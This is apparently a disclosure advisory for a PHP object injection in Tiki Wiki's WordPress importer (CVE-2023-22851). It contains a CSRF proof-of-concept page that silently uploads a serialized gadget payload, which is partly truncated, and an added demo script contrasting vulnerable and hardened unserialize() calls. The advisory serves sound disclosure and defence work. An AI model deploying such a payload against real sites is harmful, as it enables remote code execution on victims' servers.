- Tiki Wiki CMS Groupware 24.1 tikiimporter_blog_wordpress.php PHP Object Injection[6]
- Authored by EgiX[7] | Site karmainsecurity.com[8]
Tiki Wiki CMS Groupware versions 24.1 and below suffer from a PHP object injection vulnerability in tikiimporter_blog_wordpress.php.
- advisories | CVE-2023-22851[9]
- SHA-256 | 1b6698ff49dd75e5444eb0fdffd03d9806fd9c813b8e9255172cc30fc8eee07c
----------------------------------------------------------------------------------------------------
Tiki Wiki CMS Groupware <= 24.1 (tikiimporter_blog_wordpress.php) PHP
Object Injection Vulnerability
----------------------------------------------------------------------------------------------------
[-] Software Link:
https://tiki.org
[-] Affected Versions:
Version 24.1 and prior versions.
[-] Vulnerability Description:
The vulnerability is located in the
/lib/importer/tikiimporter_blog_wordpress.php script. Specifically, when
importing data from WordPress sites through the Tiki Importer, data taken
from the uploaded XML (WXR export) file is passed to PHP's unserialize()
function. This can be exploited by malicious users to inject arbitrary PHP
objects into the application scope, allowing them to perform a variety of
attacks, such as executing arbitrary PHP code. Successful exploitation of
this vulnerability requires an admin account (specifically, the
'tiki_p_admin_importer' permission). However, due to the CSRF vulnerability
described in KIS-2023-01, this vulnerability can also be exploited by
tricking a victim user who holds that permission into opening a web page
like the following:
<html>
<form action="http://localhost/tiki/tiki-importer.php" method="POST"
enctype="multipart/form-data">
<input type="hidden" name="importerClassName"
value="TikiImporter_Blog_Wordpress" />
<input type="hidden" name="importAttachments" value="on" />
<input type="file" name="importFile" id="fileinput"/>
</form>
<script>
// Base64-encoded WordPress WXR export; its wp:meta_value element carries the
// serialized PHP object chain that reaches unserialize() on the server
const xmlContent =
atob("…ZGF0YSI7YToxOntTOjc6ImZvcm11bGEiO1M6MTQ6Im51bGw7cGhwaW5mbygpIjt9fVM6NDE6IlwwMFRyYWNrZXJfRmllbGRfQWJzdHJhY3RcMDB0cmFja2VyRGVmaW5pdGlvbiI7TzoxODoiVHJhY2tlcl9EZWZpbml0aW9uIjowOnt9fWk6MTtTOjEyOiJnZXRGaWVsZERhdGEiO319fV1dPjwvd3A6bWV0YV92YWx1ZT4KICAgPC93cDpwb3N0bWV0YT4KICA8L2l0ZW0+CiA8L2NoYW5uZWw+CjwvcnNzPg==");
const fileInput = document.getElementById("fileinput");
const dataTransfer = new DataTransfer();
const file = new File([xmlContent], "test.xml", {type: "text/xml"});
dataTransfer.items.add(file);
fileInput.files = dataTransfer.files;
document.forms[0].submit();
</script>
</html>
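The server-side pattern the advisory describes, reduced to a stand-alone script. This is an added illustration, not code from Tiki or from the advisory: the DemoGadget class, the _demo meta key and the WXR fragment are constructed for the demo, and the importer functions are assumptions about the shape of the flaw, not Tiki's own code. Only the WXR namespace URI is real. The script extracts every wp:meta_value from the upload and feeds it to unserialize() once unconstrained (the vulnerable path, where the gadget's __wakeup() fires) and once with allowed_classes disabled (the hardened path, where the object is never instantiated).

```php
<?php
// Added example (not Tiki's code): unserialize() on attacker-controlled
// wp:meta_value strings from an uploaded WXR export, vulnerable vs. hardened.
declare(strict_types=1);

// Stand-in for any application class with a side-effecting magic method.
// In a real gadget chain this is an existing class of the target application.
class DemoGadget
{
    public string $cmd = '';
    public function __wakeup(): void
    {
        // A real gadget would reach eval()/system()/file writes from here.
        echo "[!] DemoGadget::__wakeup fired with cmd=" . $this->cmd . "\n";
    }
}

// Constructed WXR fragment: one post with a postmeta entry whose value is a
// serialized DemoGadget, as an attacker could place in an export they control.
$wxr = <<<'XML'
<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:wp="http://wordpress.org/export/1.2/">
 <channel>
  <item>
   <title>hello</title>
   <wp:postmeta>
    <wp:meta_key>_demo</wp:meta_key>
    <wp:meta_value><![CDATA[O:10:"DemoGadget":1:{s:3:"cmd";s:2:"id";}]]></wp:meta_value>
   </wp:postmeta>
  </item>
 </channel>
</rss>
XML;

// Pull every wp:meta_value text node out of the export (CDATA included).
function metaValues(string $xml): array
{
    $doc = new SimpleXMLElement($xml);
    $doc->registerXPathNamespace('wp', 'http://wordpress.org/export/1.2/');
    $values = [];
    foreach ($doc->xpath('//wp:postmeta/wp:meta_value') as $v) {
        $values[] = (string) $v;
    }
    return $values;
}

// Vulnerable: the attacker-controlled string reaches unserialize() unconstrained,
// so any class in the autoloader's reach is instantiated and its magic methods run.
function importMetaVulnerable(string $raw): mixed
{
    return unserialize($raw);
}

// Hardened: refuse to instantiate any class. Serialized objects come back as
// __PHP_Incomplete_Class, which has no magic methods, and are dropped outright.
function importMetaHardened(string $raw): mixed
{
    $value = @unserialize($raw, ['allowed_classes' => false]);
    if ($value === false && $raw !== 'b:0;') {
        return $raw;   // not serialized data at all: keep it as a plain string
    }
    if ($value instanceof __PHP_Incomplete_Class) {
        return null;   // object payloads are never accepted from an upload
    }
    return $value;     // scalars and arrays only
}

foreach (metaValues($wxr) as $raw) {
    echo "vulnerable: "; var_dump(importMetaVulnerable($raw));
    echo "hardened:   "; var_dump(importMetaHardened($raw));
}
```

Running it prints the __wakeup() line on the vulnerable path and NULL on the hardened one. Two caveats for a real importer: objects nested inside an array also come back as __PHP_Incomplete_Class (inert, but they should not be persisted and re-serialized where a later unserialize() might allow classes), and allowed_classes only closes the object-injection part of the bug; the CSRF delivery vector is a separate fix (KIS-2023-01), so the import endpoint still needs a token check.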
[-] Solution:
Upgrade to version 24.2 or later.
[-] Disclosure Timeline:
[07/03/2022] - Vendor notified
[23/08/2022] - Version 24.1 released
[09/01/2023] - Public disclosure
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2023-22851 to this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
http://karmainsecurity.com/KIS-2023-04